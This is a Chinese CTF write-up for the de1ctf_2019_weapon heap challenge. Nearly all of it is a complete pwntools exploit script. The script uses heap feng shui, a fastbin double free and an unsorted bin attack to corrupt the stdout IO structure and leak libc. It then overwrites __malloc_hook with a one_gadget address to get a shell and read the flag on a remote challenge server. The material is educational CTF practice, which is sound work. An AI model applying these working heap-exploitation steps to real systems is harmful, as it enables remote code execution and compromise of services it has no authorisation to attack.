Skip to content

第五页

题目12—de1ctf_2019_weapon

  • 考点:堆分水、unsorted_bin_attack、fast_bin_double_free、stdout泄露libc,详细解答在stdout任意地址读这篇博客中

  • exp如下:

from pwn import *
context.log_level = 'debug'
libc = ELF('./libc-2.23.so')
#p = process("./de1ctf_2019_weapon1")
for i in range(100):
    p = remote('node5.buuoj.cn',29028)
    def add(size,index,context):
        p.sendlineafter(b'choice >>',b'1')
        #p.interactive()
        p.sendlineafter(b'size of weapon:',str(size).encode())
        p.sendlineafter(b'input index:',str(index).encode())
        p.sendafter(b'input your name:',context)

    def delete(index):
        p.sendlineafter(b'choice >>',b'2')
        p.sendlineafter(b'input idx :',str(index).encode())

    def rename(index,context):
        p.sendlineafter(b'choice >>',b'3')
        p.sendlineafter(b'input idx:',str(index).encode())
        p.sendafter(b'new content:',context)
    # 利用double_free和堆分水,使得能将堆块放入unsorted_bin中
    add(0x50,0,b'a')
    add(0x50,1,b'a')
    add(0x60,2,b'a')
    add(0x50,3,b'a')
    add(0x50,4,b'a')

    payload = p64(0)*9 + p64(0x61)
    rename(0,payload)
    delete(1)
    delete(3)
    delete(1)
    rename(3,p8(0x50))
    #add(0x50,5,b'\x50')
    add(0x50,6,b'a')
    add(0x50,7,b'a')
    add(0x50,8,p64(0)+p64(0xd1))
    delete(1)
    delete(2)
    # 使用unsorted_bin_attack,使得libc的地址能被写入到fastbin链表中
    add(0x20,9,b'a')
    add(0x20,10,b'a')
    rename(2,p16(0x25e5-0x8))
    add(0x60,11,b'1')
    try:
        # 申请到libc地址后修改stdout的IO结构体,并接收地址
        add(0x60,12,b'\x00\x00\x00'+p64(0)*6+p64(0xfbad1800)+p64(0)*3+p8(0))
        leak = p.recvuntil(b'\x7f')[-6:]
        print('leak--->',leak)
        leak = u64(leak.ljust(8,b'\x00'))
        print('leak--->',hex(leak))
        libc_addr = leak - 192 - libc.symbols['_IO_2_1_stderr_']
        print('libc_addr--->',hex(libc_addr))
        malloc_hook = libc_addr + libc.symbols['__malloc_hook']
        des_addr = malloc_hook - 0x23
    except:
        p.close()
        continue
    #system_addr = libc_addr + libc.symbols['system']
    """
    delete(5)
    delete(6)
    delete(5)
    add(0x60,12,b'1')
    rename(5,p64(des_addr))
    add(0x60,13,b'1')
    """

    #add(0x60,12,b'1')
    """
    0x45216 execve("/bin/sh", rsp+0x30, environ)
    constraints:
    rax == NULL

    0x4526a execve("/bin/sh", rsp+0x30, environ)
    constraints:
    [rsp+0x30] == NULL

    0xf02a4 execve("/bin/sh", rsp+0x50, environ)
    constraints:
    [rsp+0x50] == NULL

    0xf1147 execve("/bin/sh", rsp+0x70, environ)
    constraints:
    [rsp+0x70] == NULL
    """
    # 再次使用fastbin_double_free,利用malloc_hook打ogg
    ogg = [0x45216,0x4526a,0xf02a4,0xf1147]
    ogg_ = ogg[3] + libc_addr
    add(0x60,13,b'1')
    add(0x60,14,b'1')
    delete(13)
    delete(14)
    delete(13)
    add(0x60,15,p64(des_addr))
    add(0x60,16,b'1')
    add(0x60,16,b'1')
    add(0x60,17,b'a'*0x13+p64(ogg_))
    sleep(0.2)
    p.sendline(b'1')
    p.sendline(b'32')
    p.sendline(b'17')
    #gdb.attach(p)
    p.sendline(b'cat flag')

    p.interactive()